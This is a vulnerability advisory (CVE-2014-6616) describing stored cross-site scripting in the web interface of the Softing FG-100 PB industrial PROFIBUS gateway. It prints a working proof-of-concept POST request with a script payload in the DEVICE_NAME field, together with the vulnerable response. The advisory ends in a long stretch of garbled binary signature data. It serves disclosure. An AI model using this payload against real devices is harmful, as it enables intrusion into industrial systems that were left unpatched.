CVE-2014-6616 Softing FG-100 Webui XSS Nov 05 2014 07:52AM
Ingmar Rosenhagen (ingmar rosenhagen csnc de)
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: Softing FG-100 PB
# Vendor: Softing AG (www.softing.com)
# CVD ID: CVE-2014-6616
# Subject: XSS
# Risk: High
# Effect: Remotely exploitable
# Author: Johannes Klick
# Daniel Marzin
# Ingmar Rosenhagen
# Date: 05.11.2014
#
#############################################################

Introduction:
-------------
Softing FG PROFIBUS [1] is a family of interfaces for remote access to
one, two or three PROFIBUS segments via Ethernet for device
parameterization, controller programming and data acquisition. This
device is used in industrial setups for making Profibus device available
via ethernet. Compass Security Deuschland GmbH [2] discovered a security
flaw in the webgui of the device which allows execution of malicious
code in the context of the user's browser session.

Affected:
---------
Firmware: FG-x00-PB_V2.02.0.00

Technical Description:
----------------------
The web gui does not properly encode output of user data in at least one
place. Exploiting this vulnerability leads to stored cross-site
scripting (XSS) and allows execution of JavaScript code

The vulnerable resource is the 'DEVICE_NAME' parameter:

POST /cgi-bin/CFGhttp HTTP/1.1
Host: 192.168.2.3
Referer: http://192.168.2.3/cgi-bin/CFGhttp

second_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=011000000
0&DE
VICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&IPADDR=192
.168
.2.3&IPADDR_ORG=192.168.2.3&NETMASK=255.255.255.0&NETMASK_ORG=255.255.25
5.0&
GATEWAY=0.0.0.0&GATEWAY_ORG=&MAINTENANCE_IP=192.168.212.231&MAINTENANCE_
IP_O
RG=192.168.212.231&STARTUP=RELOAD

Which results in the malicious code being embedded:

HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache, must-revalidate
Pragma: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN""http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Device Configuration</title></head><link
rel="stylesheet" type="text/css"
href="../fg300_pb/styles/fg300_pb.css"><body><h1>New Network
Settings</h1><table cellspacing=0 summary=""><tr><td><strong> Host Name
</strong></td><td> <SCRIPT>alert("XSS")</SCRIPT> </td><td>
</td></tr><tr><td><strong> IP Address </strong></td><td> 192.168.2.3
</td><td> </td></tr><tr><td><strong> Subnet Mask
</strong></td><td> 255.255.255.0 </td><td>
</td></tr><tr><td><strong> Default Gateway </strong></td><td>
</td><td> </td></tr><tr><td><strong> Maintenance IP Address
</strong></td><td> 192.168.212.231 </td><td>
</td></tr><tr><td><strong> New network parameters will be used
</strong></td><td> immediately
</td><td></td></tr></table><br></body></html>

Workaround / Fix:
-----------------
no patch is available

Timeline:
---------
Vendor Notified: 2014-09-15
Vendor Response: 2014-10-24
Vendor Status: Wont fix

References:
-----------
[1]:
http://industrial.softing.com/de/produkte/profibus-master-or-slave-confi
gura
ble-single-channel-remote-interface.html
[2]: http://www.csnc.de

0? *?H?÷
 ?0?1 0 +0? *?H?÷
 ?-0?½0?¥ OÔ/T»/K0
 *?H?÷
0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20
061025083246Z
361025083246Z0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20?"0
 *?H?÷
?0?
?Äñ?Óx1÷8ÉøÃ?C¼Ç÷¼7çNqºK¥s\n?®W®87C/=ÈÎhÁx®+ú,y?öè¹h¹UòD§9
ùü?ñ¢M'ùa{º·å¢¶ëa>ÐlÑæûú^í´? 5[¡?ËðI?þ?
>æÙ âO»Ü?7ü?é25"Ñ:N'?°?2Úa
GM`B®?Gè?ZPXé??¹]¡ÜÝ?J6g»Hä?¶7ëH:¯gèÊïj1?ÔÀ¶ù?q{gd¸¶?JB{e.0j õî?æòÍ?ìÙ¡Jìö²KåE?æmx?.??m6©Ä1d?? *ô5
xÉUÏA°Gé0??¾a¨?¹(z_8Ù©8°?sÁÃ;H*?!?¸Ì¨5Ã??³>¾¤?i:?xÙÉô?«V~[??9?¤
, 2?`³?À*¶ ~IòJùÕF/?£?§&¬»?<æ¼GÜsQñpd/ù´G0lDê)7??hf¼?8þ{9.ÓPðû^
`¶©¦ú'Añ?ròõ?tJÉgÄT®Hdß?Ñn°á??qéLØ¥÷GtÑQ??ó¢#@ sÛK¦çs?Á éÁY¬Fú
æ/øÏq?Fm¹Ä8yEHïÄ]×î?9"?²
XC÷q©H.ýêÖ£¬0©0Uÿ0Uÿ0ÿ0U ÍÁäA
¶:[;ËE½Â?ú?X0U#0? ÍÁäA¶:[;ËE½Â?ú?X0FU ?0=0; `?tY0.0,+ http://repository.swisssign.com/0
 *?H?÷
?sƁà'Ò-à?0â?AP,__ba©?ji tIÖ]?êARoX­PV jƽ(iX?Ü?5©:¼¥`?ØE?iÙ~»xrÁ*Ώ?pa¬ Í ¸9)V?2N?»=Ä*Ù×rîþQ¡"A±qc?°
b«^WßËÝu À]y?àPæÞ1þ?{p_¥Ø­ø¶oÓ`Ý@K"Å=­:z?G?y3º?Ü2i?nKðqþãgr ±¿
\?äú?"Ç?¹#??í%àÏe»õaïݲZA"Z¡?],è[Ém© xª`ÆVZ h¼iyÄ~?¿Åé$Q^ÔÕKSíÙ#Z6e£Á­A0óF?¯eµÕ±ä[xu?zmY©*{ÞÃ???IsxÈ=½Q5t
*Õñ~i*»;½%¸?Z=raf?î ÖMÔt jþ ü£UW?þJË®[Èò#1S8Ò-j??¹j÷^AtnÃ~¬)`??8ÊW
½0/Ç¥æA Ú®?? ¤elL ?º¸Ó¹À??0úå?kNgªÚbV>?fÒÄ6}§>ü?àÔ?彪óN£zjùbrã Oë?#ñ?»|ÜÜl?%²ò´cÒ*g??õÎêØ?jìä
»*Lë `9ÎÊbØ.n0?ý0?å .ôU¹kÆÂ?B|#vË0
 *?H?÷
0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G20
130205120250Z
160205120250Z0J10U Email Validated Only1)0'U Email: ingmar.rosenhagen (at) csnc (dot) de0 [email concealed]?"0
 *?H?÷
?0?
?¬³?ÂáÑ*9NÊo#É¥Û?ÙØ? br)ó²ðî/¤Êqý ²^lØ?}6t¥»Êº?.§ãæ\:-1sFe?¶?I?rÈ@Óu÷Aß????=¤PìøÄßO$?%òðíøä? ë$æ¾
³ÆQôÞí-?qKÂd,þßÅ ~ü¾n/þÜ/û½?p?è¹ý«ÏDÂÌÿ2FiÆð)÷UüjtAîð?ïã á>$Ú?íò
S¼Ð_æÐ{º;ç; ?cË$i¯.´iºw?éuÝ«®±?8s­Lº4?|W³zs?ª£±47V¿?.Yi£?Ó0?Ï0
Uÿ°0U% 0
+0UÓË
AWòD²?Ǻô?ÕÓ'|ï0U#0?ë5±Vm`Xôá"ÍF®Ðe0ÿU÷0ô0G E C?Ah
ttp://crl.swisssign.net/EB35B1566D156058F4E122CD1C461CAED00400650¨ ¥ 
¢??ldap://directory.swisssign.net/CN=EB35B1566D156058F4E122CD1C461CAED0
040065%2CO=SwissSign%2CC=CH?certificateRevocationList?base?objectClass=c
RLDistributionPoint0dU ]0[0Y `?tY0L0J+>http://repository.swisssign.com/SwissSign-Silve
r-CP-CPS-R4.pdf0Ù+Ì0É0d+0?Xhttp://swisssign.net/cgi
-bin/authority/download/EB35B1566D156058F4E122CD1C461CAED00400650a+
0?Uhttp://silver-personal-g2.ocsp.swisssign.net/EB35B1566D156058F4E12
2CD1C461CAED00400650$U0ingmar.rosenhagen (at) csnc (dot) de0 [email concealed]
 *?H?÷
?zØÊ°?/¬Æ]ïÀó.¯)s?ÈÑ¥ôÒÍ?ύþH^#?Fs>åd­Øæ°´öwd¦??¼o
´©2À?Üà^
(é?Ê?w¾m1·-:ï ={x=½CkA@º?۝À°£¶h<ÖÖ(é?˽ýA¹jq<c¦u³#??nS²·?ôGL.^æ?*ïˍ§±8HÒö¾?f
i¹?s!òtì?w ½2æH?ùÎ?ªÿu98#C÷Ø?éT2l?¹%?À©? Ï6ÔoہAS?X_c±{?nðßÆ?ë?¡O®2¶Jywó
F)üÎ?ùZ?#¹Ò[{ÊA.Í=oPÈ0?g0?O  âV·S?kvX0
 *?H?÷
0G1 0 UCH10U
 SwissSign AG1!0USwissSign Silver CA - G20
080709111109Z
230709111109Z0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G20?"0
 *?H?÷
?0?
?÷óS^Im?å'!`¥v??¸!@Ï63¬*r?aÃkÞzIX=?Ø;ðA¿kV³=¿cº1~ârFh?
×?O É{©Ð9Ñ?Ö5ghvÁ_? ÍÏ:Ñ?
ÚòCò¤¢¬?u è÷4§¿¶æ9hfRG9)M´è*­a´¢1à?ÛäCñ+ÞÁ4Ël?îb'DØ1ñß<!ÌÀ¬h
ÓthÉJ?; §±e¤®.zÞzDo°þtÿ?õXé¦%ñÌ?"'ØË1Á/( qr÷ûNnz¬!?
Zfø¿åù?Ä?º3
??]®¡£?F0?B0Uÿ0Uÿ0ÿ0Uë5±Vm
`Xôá"ÍF®Ðe0U#0? ÍÁäA¶:[;ËE½Â?ú?X0ÿU÷0ô0G E C?Ahttp
://crl.swisssign.net/17A0CDC1E441B63A5B3BCB459DBD1CC298FA86580¨ ¥ ¢?
?ldap://directory.swisssign.net/CN=17A0CDC1E441B63A5B3BCB459DBD1CC298FA8
658%2CO=SwissSign%2CC=CH?certificateRevocationList?base?objectClass=cRLD
istributionPoint0dU ]0[0Y `?tY0L0J+>http://repository.swisssign.com/SwissSign-Silve
r-CP-CPS-R3.pdf0t+h0f0d+0?Xhttp://swisssign.net/cgi-bi
n/authority/download/17A0CDC1E441B63A5B3BCB459DBD1CC298FA86580
 *?H?÷
?.*vÚ?óLßd'á[-?ï¹U.Û¸ e1@°K½|±ÙØqSÎè5,?ºt?ÔW?ÀW??P%{à?Ô]¸Dxé3Aþá¿F?y}r¼8PÀhZ²ÓÞ]gÏi?ø
õ¬ ?ÔÝZ.j9#ïôïsZ6Ãé Gd79y×P²¬º?ê?äEF¾Í/9?
?ðU²&$Q³kÑ|i=XՁ5<hGWÆ³Ï*jE/?©N=Á9ÊëûÞJ?­¸a? ¸?#´vC?®?8^Ò8õ?Ù Õ.øÉ??§ ³Ò(]#lNfñ?c ÜbÄGâr¢àm~=]?E?h?¥ðõíÛ??Îé¦?Úßn5Ú`ö°G?4å¼`´ÀÀ(ôn<¹ú
I?:e8´µa??!ï??Åu(5«^R`/:ï1?¦{÷H p<µ×bË´BÃô¸Dq?$ü×î?!èªc?ÃÏ[òÒ?p'TÌî¡Ñ "?^Ð?C9ªRNgÚ2¼Z??Ú6«Szôwêü×èÞê?ÆnPDàÏ0Ê??¡ §ü¹èÅ-ósõTþ(א##)OI3y
?J^a?f]Ñ?o?.![eDÍvIò¥ƶ~?¢6£)¡x«$]ð
t

y?aHUÞF¹¹Ûª?1??0??0h0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G2.ôU¹kÆÂ?B|#vË0 + ?ÿ0 *?H?÷
 1  *?H?÷
0 *?H?÷
 1
141105075229Z0# *?H?÷
 1ý?éÓWeô¶¬­×>^? ¼0w +?71j0h0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G2.ôU¹kÆÂ?B|#vË0y *?H?÷
  1j h0U1 0 UCH10U
 SwissSign AG1/0-U&SwissSign Personal Silver CA 2008 - G2.ôU¹kÆÂ?B|#vË0« *?H?÷
 10?0  `?He*0  `?He0
*?H?÷
0  `?He0*?H?÷
?0+0
*?H?÷
@0
*?H?÷
(0+0  `?He0  `?He0  `?He0
 *?H?÷
?ø¼çI5ýK¤ÛÚ*bv¦`×Eq3?÷xÛbÿ b?'-AÇ©ºóv6$?Ö\i*[xl+M°\b,ç?¬[©­DO?¿ýö6èH N<k?@¡¾;~H·jÀ÷Ư
È£è;Ç+R¥Â~Ê`­~]¾Jª1}:Z¿fh½ÎpÁfôP?a4CÛÏ{ÛJ?
"Û½C°Qÿ35Ʋèn³?ñãÆýÍg0n:OMR¯º)¡{Ú³û¨ICL¢µ*?<Éa2öî?ì©vfGLIr?<
¶Rä_¶ç¿W?¯7ûîæÊ?NÛA9ª~5YF½

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus